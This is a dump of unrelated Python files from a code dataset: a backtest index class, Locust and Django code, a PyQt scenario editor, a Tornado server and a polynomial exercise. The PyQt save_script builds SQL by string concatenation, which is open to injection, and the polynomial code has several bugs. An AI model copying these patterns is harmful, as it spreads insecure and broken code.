np.datetime64(self.rebalancing_calendar[0]):\n raise ValueError(\"end_date is not allowed to be before the rebalancing calendar.\")\n\n # retrieve the underlying price to be used in the index\n underlying_price_df = self.basket_prices(start_date, end_date)\n self._check_before_back_test()\n\n # adjust rebalance calendar by moving one business day ahead in the underlying price calendar\n rebalancing_calendar = self.adjust_rebalance_calendar(self.rebalancing_calendar, underlying_price_df.index)\n\n # calculate the signal and if there is no observation calendar assigned to the signal assign a default one\n if self.signal.signal_observation_calendar is None:\n self.signal.signal_observation_calendar = underlying_price_df.index\n signal_df = self.signal.get_signal_df()\n\n # calculate the weights\n self.weight.signal_df = signal_df\n weight_df = self.weight.get_weights()\n weight_df = select_rows_from_dataframe_based_on_sub_calendar(weight_df, rebalancing_calendar)\n\n if get_back_test:\n return index_calculation(underlying_price_df, weight_df, self.transaction_cost, self.index_fee,\n self.initial_amount)\n else:\n return weight_df\n\n # ------------------------------------------------------------------------------------------------------------------\n # getter and setter and static methods\n @staticmethod\n def adjust_rebalance_calendar(rebalance_calendar: pd.DatetimeIndex, daily_calendar: pd.DatetimeIndex) \\\n -> pd.DatetimeIndex:\n \"\"\"Assumes that rebalance_calendar and daily_calendar are of type DatetimeIndex. If a rebalance date does not\n exist in daily_calendar, pick the following day. Returns a DatetimeIndex.\"\"\"\n date_is_in_cal = np.array(np.in1d(np.array(rebalance_calendar.values, dtype='datetime64[D]'),\n np.array(daily_calendar.values, dtype='datetime64[D]')))\n adjusted_date_list = []\n for i in range(date_is_in_cal.size):\n if date_is_in_cal[i]:\n adjusted_date_list.append(rebalance_calendar[i])\n else:\n # find the following day to be the rebalance date if it does not exist in the daily calendar\n adjusted_date_list.append(\n max(daily_calendar,\n key=lambda x: min((x - rebalance_calendar[i]).days, 0))\n )\n return pd.DatetimeIndex(adjusted_date_list)\n\n @property\n def signal(self):\n return self._signal\n\n @signal.setter\n def signal(self, signal):\n if issubclass(type(signal), Signal) or isinstance(signal, Signal):\n self._signal = signal\n else:\n raise ValueError('Needs to be an object from Signal class or a subclass of class Signal.')\n\n @property\n def weight(self):\n return self._weight\n\n @weight.setter\n def weight(self, weight):\n if issubclass(type(weight), _Weight):\n self._weight = weight\n else:\n raise ValueError('Needs to be an object from a subclass of class _Weight.')\n\n @property\n def rebalancing_calendar(self):\n return self._rebalancing_calendar\n\n @rebalancing_calendar.setter\n def rebalancing_calendar(self, rebalancing_calendar: pd.DatetimeIndex):\n if rebalancing_calendar.is_monotonic_increasing:\n self._rebalancing_calendar = rebalancing_calendar\n else:\n raise ValueError('rebalancing_calendar needs to be monotonic increasing (oldest to newest date).')\n\n @property\n def index_fee(self):\n return self._index_fee\n\n @index_fee.setter\n def index_fee(self, index_fee: float):\n self._index_fee = index_fee\n if index_fee < 0:\n logger.warning('index_fee is negative.')\n\n @property\n def transaction_cost(self):\n return self._transaction_cost\n\n @transaction_cost.setter\n def transaction_cost(self, transaction_cost: float):\n if transaction_cost >= 0:\n self._transaction_cost = transaction_cost\n else:\n raise ValueError('transaction_cost needs to be greater or equal to zero.')\n\n @property\n def initial_amount(self):\n return self._initial_amount\n\n @initial_amount.setter\n def initial_amount(self, initial_amount: float):\n if initial_amount > 0:\n self._initial_amount = initial_amount\n else:\n raise ValueError('initial_amount needs to be greater than zero.')\n\n\n","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":8663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"12497251","text":"from locust import HttpLocust, TaskSet, task\nimport json\n\nclass UserBehavior(TaskSet):\n def on_start(self):\n self.client.get(\"/\")\n\n @task(2) \n def credits(self):\n self.client.get(\"/credits/\")\n\n @task(3)\n def credit(self):\n self.client.get(\"/credits/1\")\n\n @task(4)\n def create_credit(self):\n headers = {'content-type': 'application/json',\n 'Accept-Encoding': 'gzip'}\n self.client.post(\"/credits/\", data=json.dumps({\n \"title\": \"changed11\", \"rateOfInterest\": 62, \"description\": \"some\"\n }),\n headers=headers,\n name=\"Create a new credit\")\n\n @task(5)\n def update_credit(self):\n headers = {'content-type': 'application/json',\n 'Accept-Encoding': 'gzip'}\n self.client.put(\"/update/1\", data=json.dumps({\n \"title\": \"credit12\", \"rateOfInterest\": 32, \"description\": \"none\"\n }),\n headers=headers,\n name=\"Update a credit\")\n\n @task(6)\n def delete(self):\n self.client.delete('/delete/2')\n\nclass WebsiteUser(HttpLocust):\n task_set = UserBehavior\n wait_time = 3000\n","sub_path":"locust_tests/locust.py","file_name":"locust.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"22696159","text":"\n\nfrom xai.brain.wordbase.nouns._stripe import _STRIPE\n\n#calss header\nclass _STRIPES(_STRIPE, ):\n\tdef __init__(self,): \n\t\t_STRIPE.__init__(self)\n\t\tself.name = \"STRIPES\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"stripe\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_stripes.py","file_name":"_stripes.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"150971862","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('members', '0001_initial'),\n ('events', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='EventPerson',\n fields=[\n ('id', models.AutoField(serialize=False, primary_key=True, verbose_name='ID', auto_created=True)),\n ('type', models.CharField(default='S', max_length=1, choices=[('T', 'Teacher'), ('S', 'Student'), ('D', 'DJ'), ('G', 'Guest')])),\n ('event', models.ForeignKey(related_name='person', to='events.Event')),\n ('person', models.ForeignKey(related_name='event', to='members.Person')),\n ],\n ),\n migrations.AddField(\n model_name='event',\n name='people',\n field=models.ManyToManyField(related_name='events', to='members.Person', through='events.EventPerson'),\n ),\n ]\n","sub_path":"api/events/migrations/0002_auto_20151005_2145.py","file_name":"0002_auto_20151005_2145.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"324697552","text":"# -*- coding: Utf-8 -*-\nimport base64\nimport pickle\n\nfrom PyQt5 import QtCore, QtGui, QtWidgets\n\nfrom common_blocks.PRZ.static.GVARS import GV, warning\n\nfrom common_blocks.PRZ.forms.training_script_ui import Ui_FormTrainingScript\nfrom common_blocks.PRZ.prz_modules.training_script_package.tree_widget_item import TreeWidgetItem\nfrom common_blocks.PRZ.prz_modules.training_script_package.task_link import TaskLink\nfrom common_blocks.PRZ.prz_modules.training_script_package.save_script import wdg_save_script\nfrom common_blocks.PRZ.prz_modules.training_script_package.script_track import ScriptTrack\nfrom common_blocks.PRZ.prz_modules.training_script_package.recorded_scripts import recorded_scripts\n\n\n\nclass TrainingScript(QtWidgets.QWidget):\n\n signalOperDateChanged = QtCore.pyqtSignal(QtCore.QDateTime)\n\n def __init__(self):\n QtWidgets.QWidget.__init__(self)\n\n self.__tune_ui()\n self.__create_connects()\n\n def __tune_ui(self):\n self.ui = Ui_FormTrainingScript()\n self.ui.setupUi(self)\n\n self.script_track = ScriptTrack()\n self.script_track.setParent(self.ui.script_widget_content)\n self.ui.script_widget_content.resize(self.script_track.size())\n self.ui.date_current.setDate(QtCore.QDate.currentDate())\n self.ui.date_current.setTime(QtCore.QTime.currentTime())\n self.ui.date_oper.setDate(QtCore.QDate.currentDate())\n self.ui.date_oper.setTime(QtCore.QTime.currentTime())\n self.__date_timer = QtCore.QTimer()\n self.__date_timer.start(1000)\n\n GV.orders_log.set_text_edit(self.ui.te_orders)\n\n def __create_connects(self):\n self.ui.treeWidget.itemClicked.connect(lambda: self.show_tasks(QtWidgets.QTreeWidgetItem, int))\n wdg_save_script.saveSignal.connect(self.save_script)\n self.__date_timer.timeout.connect(self.__update_time)\n recorded_scripts.trainingLoadedSignal.connect(self.script_track.load)\n recorded_scripts.sayTrainingName.connect(self.__set_script_name)\n self.script_track.tasklinkLoadedSignal.connect(recorded_scripts.progressbar_increment)\n self.script_track.script_timer.timeout.connect(self.__update_script_time)\n self.script_track.resizedSignal.connect(self.__resize_widget_content)\n\n self.ui.date_oper.dateTimeChanged.connect(self.signalOperDateChanged)\n\n def __update_time(self):\n self.ui.date_current.setDate(QtCore.QDate.currentDate())\n self.ui.date_current.setTime(QtCore.QTime.currentTime())\n\n self.ui.date_oper.setTime(self.ui.date_oper.time().addSecs(1))\n\n def __update_script_time(self):\n self.ui.time_script.setTime(self.script_track.time_since_start)\n self.__check_bounds()\n\n def __get_visible_area(self):\n x = self.script_track.visibleRegion().boundingRect().x()\n width = self.script_track.visibleRegion().boundingRect().width() / 2\n return x, width\n\n def __set_script_name(self, name):\n self.ui.lb_script_name.setText((name))\n\n def __set_script_status(self, status):\n self.ui.lb_script_status.setText((status))\n\n def __resize_widget_content(self, size):\n self.ui.script_widget_content.resize(size)\n\n def __center(self):\n line_pos = self.script_track.time_to_pixels(self.script_track.time_since_start, self.script_track.scale)\n self.ui.scroll_area_script.horizontalScrollBar().setValue(line_pos - self.__get_visible_area()[1])\n\n def __check_bounds(self):\n line_pos = self.script_track.time_to_pixels(self.script_track.time_since_start, self.script_track.scale)\n if line_pos >= self.__get_visible_area()[0] + self.__get_visible_area()[1]:\n self.ui.scroll_area_script.horizontalScrollBar().setValue(\n self.ui.scroll_area_script.horizontalScrollBar().value() + 1)\n\n def set_enabled(self, flag):\n self.ui.frame_tasks.setEnabled(flag)\n self.ui.bt_load.setEnabled(flag)\n self.script_track.clear()\n\n @QtCore.pyqtSlot()\n def on_bt_exit_clicked(self):\n self.close()\n\n @QtCore.pyqtSlot(bool)\n def on_bt_play_clicked(self, state):\n if state:\n if len(self.script_track.get_tasks()) == 0:\n warning.show(u\"Сценарий пуст!\")\n self.ui.bt_play.setChecked(False)\n return\n self.script_track.perform()\n self.__set_script_status(u\"выполняется\")\n GV.report.add_new_report(GV.report.ReportType.script_started, self.ui.lb_script_name.text())\n else:\n self.script_track.pause()\n self.__set_script_status(u\"пауза\")\n GV.report.add_new_report(GV.report.ReportType.script_paused, self.ui.lb_script_name.text())\n\n @QtCore.pyqtSlot()\n def on_bt_stop_clicked(self):\n self.script_track.stop()\n self.ui.bt_play.setChecked(False)\n self.__set_script_status(u\"остановлен\")\n self.ui.time_script.setTime(QtCore.QTime(0, 0, 0, 0))\n self.script_track.time_since_start = QtCore.QTime(0, 0, 0, 0)\n GV.report.add_new_report(GV.report.ReportType.script_stoped, self.ui.lb_script_name.text())\n\n @QtCore.pyqtSlot()\n def on_bt_save_clicked(self):\n if len(self.script_track.get_tasks()) == 0:\n warning.show(u\"Добавьте хотя бы одну учебную задачу на план-график!\")\n return\n wdg_save_script.show()\n\n @QtCore.pyqtSlot()\n def on_bt_load_clicked(self):\n if len(self.script_track.get_tasks())>0:\n ret = warning.show(u\"Загрузка сохраненного сценария приведет к удалению учебных задач,\"\n u\" находящихся на план-графике в данный момент!\", 1)\n if ret == QtWidgets.QMessageBox.Cancel:\n return\n if self.script_track.is_performed():\n warning.show(u\"Для изменения сценария необходимо остановить его выполнение!\")\n return\n recorded_scripts.show()\n\n @QtCore.pyqtSlot()\n def on_bt_clear_clicked(self):\n ret = warning.show(u\"Очистить план-график?\", 1)\n if ret == QtWidgets.QMessageBox.Ok:\n self.script_track.clear()\n self.__set_script_name(u\"несохраненный сценарий\")\n\n @QtCore.pyqtSlot()\n def on_bt_fwd_clicked(self):\n width = self.script_track.visibleRegion().boundingRect().width() / 2\n self.ui.scroll_area_script.horizontalScrollBar().setValue(\n self.ui.scroll_area_script.horizontalScrollBar().value() + width)\n\n @QtCore.pyqtSlot()\n def on_bt_rew_clicked(self):\n width = self.script_track.visibleRegion().boundingRect().width() / 2\n self.ui.scroll_area_script.horizontalScrollBar().setValue(\n self.ui.scroll_area_script.horizontalScrollBar().value() - width)\n\n @QtCore.pyqtSlot()\n def on_bt_center_clicked(self):\n self.__center()\n\n @QtCore.pyqtSlot()\n def on_bt_zoom_in_clicked(self):\n self.script_track.scale_track(self.script_track.scale + 1)\n self.__center()\n\n @QtCore.pyqtSlot()\n def on_bt_zoom_out_clicked(self):\n self.script_track.scale_track(self.script_track.scale - 1)\n self.__center()\n\n\n # def add_imitator_item(self, caption, idel, parent=None):\n def add_imitator_item(self, caption, parent=None):\n #print 'add_imitator:', parent\n item = TreeWidgetItem(parent)\n item.setText(0, caption)\n self.ui.treeWidget.insertTopLevelItem(0, item)\n return item\n\n\n def add_devices_item(self, caption, parent=None):\n item = TreeWidgetItem(parent)\n item.setText(1, caption)\n self.ui.treeWidget.insertTopLevelItem(1, item)\n return item\n\n\n def add_task_item(self, parent_item, caption, task):\n self.script_track.dict_tasks[task.id()] = task # таски на треке нужны для коннекта с линками\n task_link = TaskLink(self.ui.scrollAreaWidgetContents, task)\n task_link.hide()\n parent_item.add_task(task_link)\n\n\n def show_tasks(self, tree_item, column):\n for x in self.ui.scrollAreaWidgetContents.findChildren(TaskLink):\n x.hide()\n x = 10\n y = 10\n width = 0\n for task in tree_item.list_tasks:\n assert isinstance(task, TaskLink)\n task.set_coordinates(x, y, False)\n y += task.height() + 10\n if width < task.width():\n width = task.width()\n if task.property_widget is None:\n task.hide_settings()\n task.show()\n self.ui.scrollAreaWidgetContents.resize(width + 10, y)\n if len(tree_item.list_tasks) > 0:\n tree_item.list_tasks[len(tree_item.list_tasks)-1].to_long_signal.connect(self.new_height)\n\n def new_height(self, h):\n self.ui.scrollAreaWidgetContents.resize(self.ui.scrollAreaWidgetContents.width(), self.ui.scrollAreaWidgetContents.height()+h)\n\n def save_script(self, name):\n GV.db_cursor.execute(u'INSERT INTO TRAININGS (date, name) VALUES(\"' +\n (QtCore.QDate.currentDate().toString(\"dd.MM.yyyy\")) + '\",\"' + (name)+'\")')\n lid = GV.db_cursor.lastrowid\n GV.db_connect.commit()\n\n for task_link in self.script_track.get_tasks():\n\n params = pickle.dumps(task_link.get_current_properties_values())\n params_b = base64.encodestring(params)\n\n GV.db_cursor.execute('INSERT INTO TASKS_IN_TRAINING (text, time, y, id_training, id_task, task_params) '\n 'VALUES(\"' + (task_link.get_caption()) +\n '\",\"' + (task_link.time().toString()) +\n '\",' + (task_link.pos().y()) +\n ',' + (lid) +\n ',\"' + (task_link.get_id()) +\n '\",\"' + (params_b) + '\")')\n\n GV.db_connect.commit()\n\n self.__set_script_name(name)\n GV.report.add_new_report(GV.report.ReportType.script_saved, name)\n\n\n\n","sub_path":"common_blocks/PRZ/prz_modules/training_script_package/training_script.py","file_name":"training_script.py","file_ext":"py","file_size_in_byte":10271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"2678871","text":"def print_rangoli(n):\n # your code goes here\n lists= [chr(n) for n in range(ord('a'),ord('z')+1)] \n L = []\n for i in range(n):\n s = \"-\".join(lists[i:n])\n L.append((s[::-1]+s[1:]).center(4*n-3,'-'))\n\n print(\"\\n\".join(L[::-1]+L[1:n]))\n\n\n\n\n","sub_path":"hackerrank/strings/alphabet-reangoli.py","file_name":"alphabet-reangoli.py","file_ext":"py","file_size_in_byte":266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"65604306","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nfrom rest_framework.authtoken.models import Token\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom rest_framework import status\nfrom .serializers import *\nfrom internships.models import Internships\nfrom users.models import User\nfrom django.core.mail import send_mail\nfrom django.core import mail\nfrom django.http import HttpResponse\n\ntilde = \"%next%\"\nsep = \"%parting_string%\"\n\n\nclass UpdateProfile(APIView): \n def post(self, request):\n request.user.cv = request.data['cv']\n request.user.phone = request.data['phone']\n request.user.skype = request.data['skype']\n request.user.save()\n return Response({})\n\nclass AddBookmark(APIView):\n def post(self, request):\n bookmark_list = request.user.my_bookmarks.split(tilde)\n if request.data['pTitle'] not in bookmark_list:\n request.user.my_bookmarks += request.data['pTitle'] + tilde\n request.user.save()\n return Response({})\n\nclass RemoveBookmark(APIView):\n def post(self, request):\n arr = request.user.my_bookmarks.split(tilde)\n request.user.my_bookmarks = \"%next%\"\n for ptit in arr:\n if ptit == \"\":\n arr.remove(ptit)\n \n for x in range(len(arr)):\n if request.data['pTitle'] == arr[x]:\n arr.pop(x)\n break\n \n\n if not arr:\n request.user.my_bookmarks = \"%next%\"\n request.user.save()\n else:\n for x in range(len(arr)):\n request.user.my_bookmarks += arr[x] + tilde\n request.user.save()\n \n \n return Response({})\n\n\nclass MyAccepted(APIView):\n def get(self, request):\n\n request.user.my_accepted = tilde\n\n declared_projects = Internships.objects.filter(status='DC')\n for proje in declared_projects:\n email_string = proje.space_seperated_emails_of_selected_students\n email_list = email_string.split(' ')\n for e_mail in email_list:\n if request.user.email == e_mail:\n #title_look_up_3 = request.user.my_accepted.split('~')\n #new variable proje_title\n #proje_title = proje.title\n #if proje_title not in title_look_up_3:\n request.user.my_accepted += proje.title + tilde\n app_array = request.user.my_applications.split(tilde)\n acc_array = request.user.my_accepted.split(tilde)\n\n for pro in acc_array:\n if pro in app_array:\n app_array.remove(pro)\n string_to_set_app = tilde\n for pro in app_array:\n if pro != \"\":\n string_to_set_app += pro + tilde\n request.user.my_applications = string_to_set_app\n request.user.save()\n\n str_to_ret = \"\"\n title_look_up_2 = request.user.my_accepted.split(tilde)\n for tit in title_look_up_2:\n if tit != \"\":\n proj = Internships.objects.filter(title=tit)\n str_to_ret += proj.values('title')[0]['title'] + sep + proj.values('university')[0]['university'] + sep + str(proj.values('deadline')[0]['deadline']) + tilde\n\n return HttpResponse(str_to_ret)\n\n\nclass MyApplications(APIView):\n def get(self, request):\n str_to_ret = \"\"\n title_look_up_0 = request.user.my_applications.split(tilde)\n for tit in title_look_up_0:\n if tit != \"\":\n proj = Internships.objects.filter(title=tit, status='OP')\n if proj:\n str_to_ret += proj.values('title')[0]['title'] + sep + proj.values('university')[0]['university'] + sep + str(proj.values('deadline')[0]['deadline']) + tilde\n\n return HttpResponse(str_to_ret)\n\nclass ApplyToTheProject(APIView):\n def post(self, request):\n\n # request.user.my_applications=\"\"\n # request.user.save()\n\n title_look_up_1 = request.user.my_applications.split(tilde)\n project_title = request.data['pTitle']\n if project_title not in title_look_up_1:\n pemail = Internships.objects.filter(title=project_title)\n stuff = pemail.values('one_contact_email')\n #print(stuff[0]['contact_email']) DO_NOT_EDIT\n my_app_string = request.user.my_applications + request.data['pTitle'] + tilde\n request.user.my_applications = my_app_string\n\n request.user.save()\n\n internship_email = stuff[0]['one_contact_email']\n proposal_text = request.data['proposal']\n student_name = request.user.name\n student_email = request.user.email\n student_mobile = request.user.phone\n student_resume = request.user.cv\n\n #SEND AN EMAIL\n subject = request.data['pTitle'] + ' Student info. for application to project'\n message = \"APPLICANT'S NAME : \" + student_name + \" | MOBILE NO.: \" + student_mobile + \" | EMAIL ID: \" + student_email + \" | Link to student's resume: \" + student_resume + \" | Student's message: \" + proposal_text\n email_from = 'ircell@iitr.ac.in'\n recipient_list = [internship_email]\n send_mail(subject, message, email_from, recipient_list)\n\n\n else:\n print(\"user has already submitted for this project\")\n\n\n\n\n\n\n # app_string = cs_list_app + request.data['title_of_project'] + \"~\"\n #request.user.my_applications = app_string\n #request.user.save()\n\n return Response({})\n\n\nclass GetProfileData(APIView):\n def get(self, request):\n content = {\n 'name': request.user.name,\n 'dept': request.user.dept,\n 'enrol_no': request.user.enrl_no,\n 'email': request.user.email,\n 'year': request.user.year,\n 'phone': request.user.phone,\n 'skype': request.user.skype,\n 'cv': request.user.cv,\n\n }\n return Response(content)\n\nclass LoginView(APIView):\n permission_classes = ()\n\n def post(self, request):\n serializer = LoginSerializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n user = serializer.validated_data['user']\n token, created = Token.objects.get_or_create(user=user)\n\n content = {\n 'token': token.key,\n 'full_name': user.get_full_name(),\n 'short_name': user.get_short_name(),\n 'email': user.email,\n }\n return Response(content)\n\n\nclass LogoutView(APIView):\n def get(self, request):\n content = {\n 'status': 'Successfully Logged Out',\n }\n return Response(content)\n\n\nclass ChangePassword(APIView):\n def post(self, request):\n serializer = ChangePasswordSerializer(data=request.data)\n if serializer.is_valid(raise_exception=True):\n user = authenticate(email=User.objects.get(id=request.user.id).email, password=request.POST['password'])\n if not user:\n content = {\n 'status': 'Invalid Credentials',\n }\n return Response(content, status=status.HTTP_403_FORBIDDEN)\n else:\n user.set_password(request.POST['newpassword'])\n user.save()\n content = {\n 'status': 'Password Changed Successfully'\n }\n return Response(content)\n else:\n return Response(RegisterSerializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass RegisterView(APIView):\n permission_classes = ()\n password = serializers.CharField(write_only=True)\n\n def post(self, request):\n serializer = RegisterSerializer(data=request.data)\n if serializer.is_valid(raise_exception=True):\n user = serializer.save()\n token, created = Token.objects.get_or_create(user=user)\n content = {\n 'token': token.key,\n 'full_name': user.get_full_name(),\n 'short_name': user.get_short_name(),\n 'email': user.email,\n }\n return Response(content)\n else:\n return Response(RegisterSerializer.errors, status=status.HTTP_400_BAD_REQUEST)\n","sub_path":"users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"277028508","text":"from opengever.base.viewlets.byline import BylineBase\nfrom opengever.contact import _\nfrom Products.CMFPlone import PloneMessageFactory as PMF\n\n\nclass ContactByline(BylineBase):\n\n def get_items(self):\n return [\n {'class': 'sequenceNumber',\n 'label': _('label_sequence_number', default='Sequence Number'),\n 'content': self.context.model.contact_id,\n 'replace': False},\n\n {'class': 'active',\n 'label': _('label_active', default='Active'),\n 'content': self.active_label(),\n 'replace': False}\n ]\n\n def active_label(self):\n if self.context.model.is_active:\n return PMF('Yes')\n return PMF('No')\n","sub_path":"opengever/contact/browser/byline.py","file_name":"byline.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"428016149","text":"# coding:utf-8\n\n# 本项目学习于原github作者xtg20121013的blog项目 目的在于学习tornado框架的使用,在此感谢!\n# 本项目github地址 https://github.com/linkwanggo/blog\n# 原作者github地址 https://github.com/xtg20121013/blog_xtg\n\n\nimport os\nimport log_config\nfrom config import config\nfrom tornado.options import options\nimport tornado.web\nimport tornado.ioloop\nimport concurrent.futures\n\nfrom url_mapping import url_mapping\nfrom config import db_settings, redis_session_config, redis_pub_sub_config, site_cache_config\nfrom service.pubsub_service import PubSubService\nfrom extends.session_tornadis import SessionManager\n\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\n\nfrom extends.cache_tornadis import CacheManager\n\nimport logging\n\nlogger = logging.getLogger('main')\n\n# 站点基本配置 tornado server配置\nsettings = dict(\n template_path=os.path.join(os.path.dirname(__file__), \"template\"),\n static_path=os.path.join(os.path.dirname(__file__), \"static\"),\n debug=config.get(\"debug\", True),\n compress_response=config.get(\"compress_response\", True),\n xsrf_cookies=config.get(\"xsrf_cookies\", \"linkwang\"), # 暂时关闭xsrf postman便可提交post请求\n login_url=config.get(\"login_url\"),\n cookie_secret=config.get(\"cookie_secret\")\n)\n\n\ndef db_poll_init():\n \"\"\"初始化mysql数据库连接\"\"\"\n engine = create_engine(db_settings['engine_url'], encoding='utf8', **db_settings['engine_config'])\n db_poll = sessionmaker(bind=engine)\n return db_poll\n\n\ndef cache_manager_init():\n \"\"\"初始化cache_manager\"\"\"\n cache_manager = CacheManager(site_cache_config)\n return cache_manager\n\n\n# 项目启动类。 可在构造函数中做站点初始化(数据库连接池初始化, 初始站点配置, 初始异步线程池,加载站点缓存等)\nclass Application(tornado.web.Application):\n def __init__(self):\n super(Application, self).__init__(url_mapping, **settings)\n self.session_manager = SessionManager(options=redis_session_config)\n self.thread_executor = concurrent.futures.ThreadPoolExecutor(max_workers=config['max_thread'])\n self.db_poll = db_poll_init()\n self.cache_manager = cache_manager_init()\n self.pub_manager = None\n\n\nif __name__ == '__main__':\n options.define('port', default=config['default_server_port'], help='run server on a specific port', type=int)\n options.define('console_log', default=False, help='print log to console', type=bool)\n options.define('file_log', default=True, help='print log to file', type=bool)\n options.define('file_log_path', default=log_config.FILE['log_path'], help='path of log_file', type=str)\n # 集群中最好只有一个实例为master, 一般用于执行全局的定时任务\n options.define('master', default=config['default_master'], help='is master node?(true:master | false:slave)', type=bool)\n options.logging = None\n # 读取项目启动时, 命令行上所附加的参数\n options.parse_command_line()\n # 加载日志管理\n log_config.init(options.port, options.console_log, options.file_log, options.file_log_path)\n\n # 创建app ioloop\n app = Application()\n app.listen(options.port)\n loop = tornado.ioloop.IOLoop.current()\n pub_manager = PubSubService(redis_pub_sub_config, app, loop)\n pub_manager.long_listen() # 每次请求来都会出发站点订阅更新\n app.pub_manager = pub_manager\n loop.start()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"128224752","text":"import math\nclass Polynomial:\n\n def __init__(self, coefficients):\n self.table = coefficients;\n\n def degree(self):\n theDegree = -1;\n for i in range(0 , len(self.table)):\n #print self.table[i]\n if self.table[i] != 0:\n #print \"setter verdien til det over\"\n theDegree = i\n return theDegree\n\n def coefficients(self):\n return table\n\n def __call__(self, x):\n counter = 0\n counter2 = 0\n for index in self.table: \n counter+=index * pow((x), counter2)\n counter2+=1\n return counter\n\n \n def __add__(self, p):\n addTable = []\n\n if isinstance( p, int ):\n for tmp in self.table:\n if tmp != 0:\n addTable.append(tmp + p)\n else:\n addTable.append(0)\n return Polynomial(addTable)\n elif not(isinstance( p, Polynomial ) or isinstance( p,int )):\n raise ArithmeticError\n \n for tmp in self.table:\n addTable.append(tmp)\n\n for i, j in enumerate(p.table):\n ''' hvor i er index og j er innhold '''\n if i > len(addTable)-1:\n addTable.append(j)\n else:\n addTable[i] += j\n\n return Polynomial(addTable)\n \n def __sub__(self, p):\n subTable = []\n\n if isinstance( p, int ):\n for tmp in self.table:\n if tmp != 0:\n subTable.append(tmp - p)\n else:\n subTable.append(0)\n return Polynomial(addTable)\n elif not(isinstance( p, Polynomial ) or isinstance( p,int )):\n raise ArithmeticError\n \n for tmp in self.table:\n subTable.append(tmp)\n\n for i, j in enumerate(p.table):\n ''' hvor i er index og j er innhold '''\n if i > len(subTable)-1:\n subTable.append(i)\n else:\n subTable[i] -= j\n\n return Polynomial(subTable)\n\n def __mul__(self, c):\n if not isinstance(c, int ):\n return ArithmeticError\n\n mulTable = []\n for tmp in self.table:\n mulTable.append(tmp * c)\n\n return Polynomial(mulTable)\n\n\n def __rmul__(self, c):\n\n mulTable = []\n for tmp in self.table:\n mulTable.append(tmp * c)\n\n return Polynomial(mulTable)\n \n def __repr__(self):\n rep = \"\"\n notFirst = False\n for i in reversed(range(0,len(self.table))):\n if self.table[i] != 0:\n if self.table[i] > 0 and i != len(self.table)-1:\n if notFirst:\n rep += \" + \"\n if i != 0:\n if self.table[i] != 1:\n rep += str(self.table[i])\n rep += \"x\"\n if i != 1:\n rep += \"^\"+str(i)\n notFirst = True\n else:\n rep += str(self.table[i])\n notFirst = True\n\n return rep\n\n def __eq__(self, p):\n if len(self.table) != len(p.table):\n return False\n for i, j in enumerate(self.table):\n ''' hvor i er index og j er innhold '''\n if j != p.table[i]:\n return False\n\n return True\n\ndef sample_usage():\n p = Polynomial([1, 2, 1]) # 1 + 2x + x^2\n q = Polynomial([9, 5, 0, 6]) # 9 + 5x + 6x^3\n \n \n print(\"The value of {} at {} is {}\".format(p, 7, p(7)))\n\n print(\"The coefficients of {} are {}\".format(p, p.coefficients()))\n\n \n print(\"\\nAdding {} and {} yields {}\".format(p, q, p+q))\n\n p, q, r = map(Polynomial,\n [\n [1, 0, 1], [0, 2, 0], [1, 2, 1]\n ]\n )\n \n print(\"\\nWill adding {} and {} be the same as {}? Answer: {}\".format(\n p, q, r, p+q == r\n ))\n print(\"\\nIs {} - {} the same as {}? Answer: {}\".format(\n p, q, r, p-q == r\n ))","sub_path":"INF3331/assignment3/polynomials.py","file_name":"polynomials.py","file_ext":"py","file_size_in_byte":4068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"76832809","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\n 讯飞身份证OCR接口\n documents https://www.xfyun.cn/doc/words/idCardRecg/API.html#%E6%8E%A5%E5%8F%A3%E8%BF%94%E5%9B%9E%E5%8F%82%E6%95%B0\n\"\"\"\n\n__author__ = 'Van23qf'\n\n\nimport requests\nimport time\nimport hashlib\nimport base64\nimport json\n\nfrom system import global_dict\n\n\n# 身份证识别接口接入地址\nURL = \"http://webapi.xfyun.cn/v1/service/v1/ocr/idcard\"\n\n\ndef getHeader():\n api_config = global_dict.get_value(\"api_config\")\n # 应用APPID(必须为webapi类型应用,并开通身份证识别服务,参考帖子如何创建一个webapi应用:http://bbs.xfyun.cn/forum.php?mod=viewthread&tid=36481)\n APPID = api_config['appid']\n # 接口密钥(webapi类型应用开通身份证识别服务后,控制台--我的应用---身份证识别---相应服务的apikey)\n API_KEY = api_config['appsecret']\n curTime = str(int(time.time()))\n param = {\"engine_type\": \"idcard\", \"head_portrait\": \"0\"}\n param = json.dumps(param)\n paramBase64 = base64.b64encode(param.encode('utf-8'))\n m2 = hashlib.md5()\n str1 = API_KEY + curTime 